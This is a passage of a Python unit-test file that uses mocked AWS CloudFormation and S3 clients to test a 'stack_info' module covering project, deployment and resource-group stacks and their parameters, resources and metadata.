make_stack_arn(MOCK_STACK_NAME)\n\nMOCK_LOGICAL_RESOURCE_ID = 'test-logical-resource-id'\nMOCK_PHYSICAL_RESOURCE_ID = 'test-physical-resource-id'\nMOCK_RESOURCE_TYPE = 'test-resource-type'\nMOCK_RESOURCE_STATUS = 'test-resource-status'\nMOCK_RESOURCE_STATUS_REASON = 'test-resource-status-reason'\nMOCK_RESOURCE_LAST_UPDATED_TIMESTAMP = '2011-06-21T20:15:58Z'\n\ndef make_resource_summary(\n physical_resource_id = MOCK_PHYSICAL_RESOURCE_ID, \n logical_resource_id = MOCK_LOGICAL_RESOURCE_ID, \n resource_type = MOCK_RESOURCE_TYPE, \n resource_status = MOCK_RESOURCE_STATUS,\n resource_status_reason = MOCK_RESOURCE_STATUS_REASON,\n last_updated_timestamp = MOCK_RESOURCE_LAST_UPDATED_TIMESTAMP):\n return {\n 'LogicalResourceId': logical_resource_id,\n 'PhysicalResourceId': physical_resource_id,\n 'ResourceType': resource_type,\n 'ResourceStatus': resource_status,\n 'ResourceStatusReason': resource_status_reason,\n 'LastUpdatedTimestamp': last_updated_timestamp\n }\n\ndef make_random_resource_summary():\n id = str(random.randint(100000, 999999))\n return make_resource_summary(\n physical_resource_id = 'test-physical-resource-id-' + id,\n logical_resource_id = 'test-logical-resource-id-' + id,\n resource_type = 'test-resource-type-' + id\n )\n\nMOCK_RESOURCE_SUMMARY = make_resource_summary()\n\nMOCK_RESOURCE_SUMMARY_LIST = [ MOCK_RESOURCE_SUMMARY ]\n\nMOCK_TEMPLATE = 'mock-template'\n\ndef make_list_stack_resources_response(resource_summary_list):\n return {\n 'StackResourceSummaries': resource_summary_list\n }\n\ndef make_template_with_stack_type(stack_type):\n return {\n \"Metadata\": {\n \"CloudCanvas\": {\n \"StackType\": stack_type\n }\n }\n }\n\ndef make_get_template_response(template):\n return {\n 'TemplateBody': json.dumps(template)\n }\n\ndef make_parameter(key, value):\n return {\n \"ParameterKey\": key,\n \"ParameterValue\": value\n }\n\nMOCK_PARAMETER_NAME = \"test-parameter-name\"\nMOCK_PARAMETER_VALUE = \"test-parameter-value\"\n\nMOCK_PARAMETER = make_parameter(MOCK_PARAMETER_NAME, MOCK_PARAMETER_VALUE)\n\nMOCK_PARAMETERS = [ MOCK_PARAMETER ]\n\nMOCK_STACK_TYPE = 'test-stack-type'\n\ndef make_stack_description(stack_type):\n return {\n \"Parameters\": [\n make_parameter(\"CloudCanvasStack\", stack_type)\n ]\n }\n\ndef make_describe_stacks_response(stack_description):\n return {\n \"Stacks\": [\n stack_description\n ]\n }\n\nMOCK_STACK_DESCRIPTION = {\n \"Parameters\": MOCK_PARAMETERS\n}\n\ndef make_random_parameter():\n id = str(random.randint(100000, 999999))\n return {\n 'ParameterKey': 'test-parameter-name-' + id,\n 'ParameterValue': 'test-parameter-value-' + id\n }\n\nMOCK_RESOURCE_DESCRIPTION = 'test-description'\n\nMOCK_RESOURCE_METADATA = {\n 'Test': 'Metadata'\n}\n\nMOCK_RESOURCE_DETAIL = {\n 'StackName': MOCK_STACK_NAME,\n 'StackId': MOCK_STACK_ARN,\n 'LogicalResourceId': MOCK_LOGICAL_RESOURCE_ID,\n 'PhysicalResourceId': MOCK_PHYSICAL_RESOURCE_ID,\n 'ResourceType': MOCK_RESOURCE_TYPE,\n 'LastUpdatedTimestamp': MOCK_RESOURCE_LAST_UPDATED_TIMESTAMP,\n 'ResourceStatus': MOCK_RESOURCE_STATUS,\n 'ResourceStatusReason': MOCK_RESOURCE_STATUS_REASON,\n 'Description': MOCK_RESOURCE_DESCRIPTION,\n 'Metadata': json.dumps(MOCK_RESOURCE_METADATA)\n}\n\nMOCK_RESOURCE_DETAIL_RESPONSE = {\n 'StackResourceDetail': MOCK_RESOURCE_DETAIL\n}\n\nclass Test_stack_info_get_stack_info(unittest.TestCase):\n\n def test_with_project_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_PROJECT))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.ProjectInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_PROJECT)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_deployment_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_DEPLOYMENT))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.DeploymentInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_deployment_access_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_DEPLOYMENT_ACCESS))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.DeploymentAccessInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT_ACCESS)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_resource_group_stack(self):\n mock_response = make_describe_stacks_response(make_stack_description(stack_info.StackInfo.STACK_TYPE_RESOURCE_GROUP))\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n result = stack_info.get_stack_info(MOCK_STACK_ARN)\n self.assertIsInstance(result, stack_info.ResourceGroupInfo)\n self.assertEqual(result.stack_type, stack_info.StackInfo.STACK_TYPE_RESOURCE_GROUP)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\n def test_with_no_stack_type(self):\n mock_response = make_describe_stacks_response(MOCK_STACK_DESCRIPTION)\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n with self.assertRaisesRegexp(ValidationError, MOCK_STACK_ARN):\n stack_info.get_stack_info(MOCK_STACK_ARN)\n mock_describe_stacks.client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n mock_describe_stacks.assert_called_once_with(StackName=MOCK_STACK_ARN)\n\nclass Test_stack_info_ParametersDict(unittest.TestCase):\n\n def test_getitem(self):\n target = stack_info.ParametersDict(MOCK_STACK_ARN)\n target['key1'] = 'value1'\n target['key2'] = 'value2'\n self.assertEquals(target['key1'], 'value1')\n with self.assertRaisesRegexp(ValidationError, 'not-present'):\n target['not-present']\n with self.assertRaisesRegexp(ValidationError, MOCK_STACK_ARN):\n target['not-present']\n\n\nclass Test_stack_info_StackInfo(unittest.TestCase):\n\n def test_stack_arn(self):\n expected_stack_arn = 'stack-arn'\n target = stack_info.StackInfo(expected_stack_arn, MOCK_STACK_TYPE)\n actual_stack_arn = target.stack_arn\n self.assertEquals(actual_stack_arn, expected_stack_arn)\n\n def test_stack_type(self):\n expected_stack_type = 'stack-type'\n target = stack_info.StackInfo(MOCK_STACK_ARN, expected_stack_type)\n actual_stack_type = target.stack_type\n self.assertEquals(actual_stack_type, expected_stack_type)\n\n def test_client_created(self):\n with mock.patch('boto3.client') as mock_client_factory:\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_client = target.client\n actual_client_2 = target.client\n self.assertIsNotNone(actual_client)\n self.assertIs(actual_client, actual_client_2)\n mock_client_factory.assert_called_once_with('cloudformation', region_name=MOCK_REGION)\n\n def test_client_provided(self):\n expected_client = 'expected-client'\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE, client=expected_client)\n actual_client = target.client\n self.assertIs(actual_client, expected_client)\n\n def test_stack_name(self):\n expected_stack_name = MOCK_STACK_NAME\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_stack_name = target.stack_name\n self.assertEquals(actual_stack_name, expected_stack_name)\n\n def test_region(self):\n expected_region = MOCK_REGION\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_region = target.region\n self.assertEquals(actual_region, expected_region)\n\n def test_account_id(self):\n expected_account_id = MOCK_ACCOUNT_ID\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_account_id = target.account_id\n self.assertEquals(actual_account_id, expected_account_id)\n\n def test_resources(self):\n mock_resource_summary_1 = make_random_resource_summary()\n mock_resource_summary_2 = make_random_resource_summary()\n mock_resource_summary_list = [ mock_resource_summary_1, mock_resource_summary_2 ]\n mock_response = make_list_stack_resources_response(mock_resource_summary_list)\n mock_resources = [ 'mock-resource-info-1', 'mock-resource-info-2' ]\n with mock_aws.patch_client('cloudformation', 'list_stack_resources', return_value = mock_response) as mock_list_stack_resources:\n with mock.patch('stack_info.ResourceInfo', side_effect = mock_resources) as mock_ResourceInfo:\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_resources = target.resources\n actual_resources_2 = target.resources\n self.assertItemsEqual(actual_resources, mock_resources)\n self.assertIs(actual_resources, actual_resources_2)\n self.assertEquals(actual_resources.stack_arn, target.stack_arn)\n mock_list_stack_resources.assert_called_once_with(StackName = MOCK_STACK_ARN)\n mock_ResourceInfo.assert_any_call(MOCK_STACK_ARN, mock_resource_summary_1, target.client)\n mock_ResourceInfo.assert_any_call(MOCK_STACK_ARN, mock_resource_summary_2, target.client)\n\n def test_stack_description_provided(self):\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE, stack_description = MOCK_STACK_DESCRIPTION)\n actual_stack_description = target.stack_description\n self.assertEquals(actual_stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_stack_description_loaded(self):\n mock_response = make_describe_stacks_response(MOCK_STACK_DESCRIPTION)\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_response) as mock_describe_stacks:\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_stack_description = target.stack_description\n actual_stack_description_2 = target.stack_description\n self.assertEquals(actual_stack_description, MOCK_STACK_DESCRIPTION)\n self.assertIs(actual_stack_description, actual_stack_description_2)\n mock_describe_stacks.assert_called_once_with(StackName = MOCK_STACK_ARN)\n\n def test_parameters(self):\n key1 = 'key1'\n value1 = 'value1'\n key2 = 'key2'\n value2 = 'value2'\n mock_parameters = [ make_parameter(key1, value1), make_parameter(key2, value2) ]\n mock_stack_description = {\n \"Parameters\": mock_parameters\n }\n mock_parameters_dict = mock.MagicMock()\n with mock.patch('stack_info.StackInfo.stack_description', new_callable=mock.PropertyMock, return_value = mock_stack_description):\n with mock.patch('stack_info.ParametersDict', return_value = mock_parameters_dict) as mock_ParametersDict:\n target = stack_info.StackInfo(MOCK_STACK_ARN, MOCK_STACK_TYPE)\n actual_parameters = target.parameters\n actual_parameters_2 = target.parameters\n self.assertIs(actual_parameters, mock_parameters_dict)\n self.assertIs(actual_parameters_2, mock_parameters_dict)\n mock_ParametersDict.assert_called_once_with(MOCK_STACK_ARN)\n mock_parameters_dict.__setitem__.assert_any_call(key1, value1)\n mock_parameters_dict.__setitem__.assert_any_call(key2, value2)\n\n\nclass Test_stack_info_ResourceInfoList(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n self.assertIs(target.stack_arn, MOCK_STACK_ARN)\n\n def test_find_resource_no_expected_type_not_optional_present(self):\n test_value = 'test-value'\n expected_resource = mock.MagicMock(test_attr = test_value)\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n actual_resource = target._ResourceInfoList__find_resource('test_attr', test_value, None, False)\n self.assertIs(actual_resource, expected_resource)\n\n def test_find_resource_no_expected_type_not_optional_not_present(self):\n test_value = 'test-value'\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n with self.assertRaisesRegexp(ValidationError, test_value):\n target._ResourceInfoList__find_resource('test_attr', test_value, None, False)\n\n def test_find_resource_no_expected_type_optional_not_present(self):\n test_value = 'test-value'\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n actual_resource = target._ResourceInfoList__find_resource('test_attr', test_value, None, True)\n self.assertIsNone(actual_resource)\n\n def test_find_resource_expected_type_not_optional_present(self):\n test_value = 'test-value'\n expected_type = 'test-type'\n expected_resource = mock.MagicMock(test_attr = test_value, type = expected_type)\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n actual_resource = target._ResourceInfoList__find_resource('test_attr', test_value, expected_type, False)\n self.assertIs(actual_resource, expected_resource)\n\n def test_find_resource_expected_type_not_optional_wrong_type(self):\n test_value = 'test-value'\n expected_type = 'test-type'\n expected_resource = mock.MagicMock(test_attr = test_value, type = 'unexpected-type')\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1'))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2'))\n with self.assertRaisesRegexp(ValidationError, expected_type):\n target._ResourceInfoList__find_resource('test_attr', test_value, expected_type, False)\n\n def test_get_by_logical_id_default(self):\n expected_resource = 'test-resource'\n logical_id = 'test-id'\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_logical_id(logical_id)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('logical_id', logical_id, None, False)\n\n def test_get_by_logical_id_with_args(self):\n expected_resource = 'test-resource'\n logical_id = 'test-id'\n expected_type = 'test-type'\n optional = True\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_logical_id(logical_id, expected_type = expected_type, optional = optional)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('logical_id', logical_id, expected_type, optional)\n\n def test_get_by_physical_id_default(self):\n expected_resource = 'test-resource'\n physical_id = 'test-id'\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_physical_id(physical_id)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('physical_id', physical_id, None, False)\n\n def test_get_by_physical_id_with_args(self):\n expected_resource = 'test-resource'\n physical_id = 'test-id'\n expected_type = 'test-type'\n optional = True\n with mock.patch('stack_info.ResourceInfoList._ResourceInfoList__find_resource', return_value = expected_resource) as mock_find_resource:\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n actual_resource = target.get_by_physical_id(physical_id, expected_type = expected_type, optional = optional)\n self.assertIs(actual_resource, expected_resource)\n mock_find_resource.assert_called_once_with('physical_id', physical_id, expected_type, optional)\n\n def test_get_by_type(self):\n test_value = 'test-value'\n expected_type = 'test-type'\n expected_resource = mock.MagicMock(test_attr = test_value, type = expected_type)\n expected_list = [ expected_resource ]\n target = stack_info.ResourceInfoList(MOCK_STACK_ARN)\n target.append(mock.MagicMock(test_attr = 'unexpected-1', type = 'unexpected-type' ))\n target.append(expected_resource)\n target.append(mock.MagicMock(test_attr = 'unexpected-2', type = 'unexpected-type'))\n actual_list = target.get_by_type(expected_type)\n self.assertItemsEqual(actual_list, expected_list)\n\nclass Test_stack_info_ResourceInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, MOCK_CLIENT)\n self.assertIs(target.stack_arn, MOCK_STACK_ARN)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.physical_id, MOCK_PHYSICAL_RESOURCE_ID)\n self.assertIs(target.logical_id, MOCK_LOGICAL_RESOURCE_ID)\n self.assertIs(target.type, MOCK_RESOURCE_TYPE)\n self.assertIs(target.status, MOCK_RESOURCE_STATUS)\n self.assertIs(target.status_reason, MOCK_RESOURCE_STATUS_REASON)\n self.assertEquals(target.last_updated_time, dateutil.parser.parse(MOCK_RESOURCE_LAST_UPDATED_TIMESTAMP))\n\n def test_description(self):\n client = mock.MagicMock()\n client.describe_stack_resource.return_value = MOCK_RESOURCE_DETAIL_RESPONSE\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, client)\n actual_description_1 = target.description\n actual_description_2 = target.description\n self.assertIs(actual_description_1, MOCK_RESOURCE_DESCRIPTION)\n self.assertIs(actual_description_2, MOCK_RESOURCE_DESCRIPTION)\n client.describe_stack_resource.assert_called_once_with(StackName=MOCK_STACK_ARN, LogicalResourceId=MOCK_LOGICAL_RESOURCE_ID)\n\n def test_metadata(self):\n client = mock.MagicMock()\n client.describe_stack_resource.return_value = MOCK_RESOURCE_DETAIL_RESPONSE\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, client)\n actual_metadata_1 = target.metadata\n actual_metadata_2 = target.metadata\n self.assertEquals(actual_metadata_1, MOCK_RESOURCE_METADATA)\n self.assertEquals(actual_metadata_2, MOCK_RESOURCE_METADATA)\n client.describe_stack_resource.assert_called_once_with(StackName=MOCK_STACK_ARN, LogicalResourceId=MOCK_LOGICAL_RESOURCE_ID)\n\n def test_get_cloud_canvas_metadata_found(self):\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, MOCK_CLIENT)\n expected_value = 'value'\n mock_metadata = {\n 'CloudCanvas': {\n 'a': {\n 'b':{\n 'c': expected_value\n }\n }\n }\n }\n with mock.patch('stack_info.ResourceInfo.metadata', new_callable=mock.PropertyMock, return_value = mock_metadata):\n actual_value = target.get_cloud_canvas_metadata('a', 'b', 'c')\n self.assertEquals(actual_value, expected_value)\n\n\n def test_get_cloud_canvas_metadata_not_found(self):\n target = stack_info.ResourceInfo(MOCK_STACK_ARN, MOCK_RESOURCE_SUMMARY, MOCK_CLIENT)\n unexpected_value = 'value'\n mock_metadata = {\n 'CloudCanvas': {\n 'a': {\n 'b':{\n 'c': unexpected_value\n }\n }\n }\n }\n with mock.patch('stack_info.ResourceInfo.metadata', new_callable=mock.PropertyMock, return_value = mock_metadata):\n actual_value = target.get_cloud_canvas_metadata('a', 'x', 'c')\n self.assertIsNone(actual_value)\n\n\nclass Test_stack_info_ProjectInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_PROJECT)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_project_name(self):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN)\n self.assertEquals(target.project_name, MOCK_STACK_NAME)\n\n def test_deployments(self):\n mock_deployment_1_name = 'dep1'\n mock_deployment_2_name = 'dep2'\n mock_deployment_1_stack_arn = make_stack_arn(mock_deployment_1_name)\n mock_deployment_2_stack_arn = make_stack_arn(mock_deployment_2_name)\n mock_deployment_1_access_stack_arn = make_stack_arn(mock_deployment_1_name + 'access')\n mock_deployment_2_access_stack_arn = make_stack_arn(mock_deployment_2_name + 'access')\n mock_project_settings = {\n 'deployments': {\n mock_deployment_1_name: {\n 'DeploymentStackId': mock_deployment_1_stack_arn,\n 'DeploymentAccessStackId': mock_deployment_1_access_stack_arn\n },\n mock_deployment_2_name: {\n 'DeploymentStackId': mock_deployment_2_stack_arn,\n 'DeploymentAccessStackId': mock_deployment_2_access_stack_arn\n }, \n '*': {}\n }\n }\n mock_deployments = [ 'test-deployment-info-1', 'test-deployment-info-2' ]\n with mock.patch('stack_info.DeploymentInfo', side_effect = mock_deployments) as mock_DeploymentInfo:\n with mock.patch('stack_info.ProjectInfo.project_settings', new_callable=mock.PropertyMock, return_value = mock_project_settings):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN, client=MOCK_CLIENT)\n actual_deployments = target.deployments\n mock_DeploymentInfo.assert_any_call(mock_deployment_1_stack_arn, deployment_access_stack_arn = mock_deployment_1_access_stack_arn, client=MOCK_CLIENT, project_info = target)\n mock_DeploymentInfo.assert_any_call(mock_deployment_2_stack_arn, deployment_access_stack_arn = mock_deployment_2_access_stack_arn, client=MOCK_CLIENT, project_info = target)\n self.assertItemsEqual(actual_deployments, mock_deployments)\n\n def test_configuration_bucket(self):\n expected_configuration_bucket_id = 'test-id'\n mock_resource = mock.MagicMock(physical_id = expected_configuration_bucket_id)\n mock_resources = mock.MagicMock()\n mock_resources.get_by_logical_id.return_value = mock_resource\n with mock.patch('stack_info.ProjectInfo.resources', new = mock.PropertyMock( return_value = mock_resources )):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN)\n actual_configuration_bucket_id = target.configuration_bucket\n self.assertEquals(actual_configuration_bucket_id, expected_configuration_bucket_id)\n mock_resources.get_by_logical_id.assert_called_once_with('Configuration', expected_type='AWS::S3::Bucket')\n\n def test_project_settings(self):\n\n mock_project_settings = {\n 'Test': 'Setting'\n }\n\n mock_configuration_bucket_arn = 'mock-arn'\n\n mock_response = mock_aws.s3_get_object_response(json.dumps(mock_project_settings))\n\n with mock_aws.patch_client('s3', 'get_object', return_value = mock_response, reload = stack_info) as mock_get_object:\n with mock.patch('stack_info.ProjectInfo.configuration_bucket', new_callable=mock.PropertyMock, return_value = mock_configuration_bucket_arn):\n target = stack_info.ProjectInfo(MOCK_STACK_ARN)\n actual_project_settings = target.project_settings\n self.assertEquals(actual_project_settings, mock_project_settings)\n mock_get_object.assert_called_once_with(Bucket=mock_configuration_bucket_arn, Key='project-settings.json')\n\n \nclass Test_stack_info_DeploymentInfo(unittest.TestCase):\n\n def test_constructor(self):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, client = MOCK_CLIENT, stack_description = MOCK_STACK_DESCRIPTION)\n self.assertEquals(target.stack_type, stack_info.StackInfo.STACK_TYPE_DEPLOYMENT)\n self.assertIs(target.client, MOCK_CLIENT)\n self.assertIs(target.stack_description, MOCK_STACK_DESCRIPTION)\n\n def test_deployment_name(self):\n mock_deployment_name = 'test-deployment'\n mock_parameters = { 'DeploymentName' : mock_deployment_name }\n with mock.patch('stack_info.DeploymentInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n self.assertEquals(target.deployment_name, mock_deployment_name)\n\n def test_deployment_access_provided(self):\n mock_deployment_access = 'test-deployment-access'\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, deployment_access_info = mock_deployment_access, client=MOCK_CLIENT)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n\n def test_deployment_access_arn_provided(self):\n mock_deployment_access = 'test-deployment-access'\n with mock.patch('stack_info.DeploymentAccessInfo', return_value = mock_deployment_access) as mock_DeploymentAccessInfo:\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, deployment_access_stack_arn = mock_deployment_access_stack_arn, client=MOCK_CLIENT)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n mock_DeploymentAccessInfo.assert_called_once_with(mock_deployment_access_stack_arn, deployment_info = target, client=MOCK_CLIENT)\n\n def test_deployment_access_arn_discovered(self):\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n mock_describe_stacks_result = {\n 'Stacks': [\n {\n 'StackId': mock_deployment_access_stack_arn,\n 'StackStatus': 'UPDATE_COMPLETE'\n }\n ]\n }\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n mock_deployment_access = 'test-deployment-access'\n with mock.patch('stack_info.DeploymentAccessInfo', return_value = mock_deployment_access) as mock_DeploymentAccessInfo:\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n mock_DeploymentAccessInfo.assert_called_once_with(mock_deployment_access_stack_arn, deployment_info = target, client=target.client)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_access_denied(self):\n mock_describe_stacks_result = ClientError(\n {\n 'Error': {\n 'Code': 'ValidationError'\n }\n },\n 'describe-stacks'\n )\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n with mock_aws.patch_client('cloudformation', 'describe_stacks', side_effect = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n self.assertIsNone(actual_deployment_access)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_not_access_denied(self):\n mock_error_code = 'SomeErrorCode'\n mock_describe_stacks_result = ClientError(\n {\n 'Error': {\n 'Code': mock_error_code\n }\n },\n 'describe-stacks'\n )\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n with mock_aws.patch_client('cloudformation','describe_stacks', side_effect = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n with self.assertRaisesRegexp(ClientError, mock_error_code):\n actual_deployment_access = target.deployment_access\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_deleted(self):\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n mock_describe_stacks_result = {\n 'Stacks': [\n {\n 'StackId': 'wrong-stack-id',\n 'StackStatus': 'DELETE_COMPLETE'\n },\n {\n 'StackId': mock_deployment_access_stack_arn,\n 'StackStatus': 'UPDATE_COMPLETE'\n }\n ]\n }\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n mock_deployment_access = 'test-deployment-access'\n with mock.patch('stack_info.DeploymentAccessInfo', return_value = mock_deployment_access) as mock_DeploymentAccessInfo:\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n self.assertIs(actual_deployment_access, mock_deployment_access)\n mock_DeploymentAccessInfo.assert_called_once_with(mock_deployment_access_stack_arn, deployment_info = target, client=target.client)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_deployment_access_arn_discovered_with_deleted_only(self):\n mock_deployment_access_stack_arn = 'deployment-access-stack-arn'\n mock_describe_stacks_result = {\n 'Stacks': [\n {\n 'StackId': 'wrong-stack-id',\n 'StackStatus': 'DELETE_COMPLETE'\n },\n {\n 'StackId': mock_deployment_access_stack_arn,\n 'StackStatus': 'DELETE_COMPLETE'\n }\n ]\n }\n mock_deployment_access_stack_name = MOCK_STACK_NAME + '-Access'\n with mock_aws.patch_client('cloudformation', 'describe_stacks', return_value = mock_describe_stacks_result) as mock_describe_stacks:\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN)\n actual_deployment_access = target.deployment_access\n self.assertIsNone(actual_deployment_access)\n mock_describe_stacks.assert_called_once_with(StackName=mock_deployment_access_stack_name)\n\n def test_project_provided(self):\n mock_project_info = 'test-project-info'\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, project_info=mock_project_info)\n self.assertIs(target.project, mock_project_info)\n\n def test_project_discovered(self):\n mock_project_stack_id = 'test-project-stack-id'\n mock_project = 'test-project-info'\n mock_parameters = { 'ProjectStackId' : mock_project_stack_id }\n with mock.patch('stack_info.ProjectInfo', return_value = mock_project) as mock_ProjectInfo:\n with mock.patch('stack_info.DeploymentInfo.parameters', new = mock.PropertyMock( return_value = mock_parameters )):\n target = stack_info.DeploymentInfo(MOCK_STACK_ARN, client=MOCK_CLIENT)\n actual_project = target.project\n actual_project_2 = target.project\n self.assertIs(actual_project, mock_project)\n self.assertIs(actual_project_2, mock_project)\n mock_ProjectInfo.assert_called_once_with(mock_project_stack_id, client=MOCK_CLIENT)\n\n def test_resource_groups(self):\n mock_physical_resource_id_1 = 'mock_physical_resource_id_1'\n mock_physical_resource_id_2 = 'mock_physical_resource_id_2'\n mock_logical_resource_id_1 = 'mock_logical_id_1'\n mock_logical_resource_id_2 = 'mock_logical_id_2'\n mock_resource_1 = mock.MagicMock()\n mock_resource_1.physical_id = 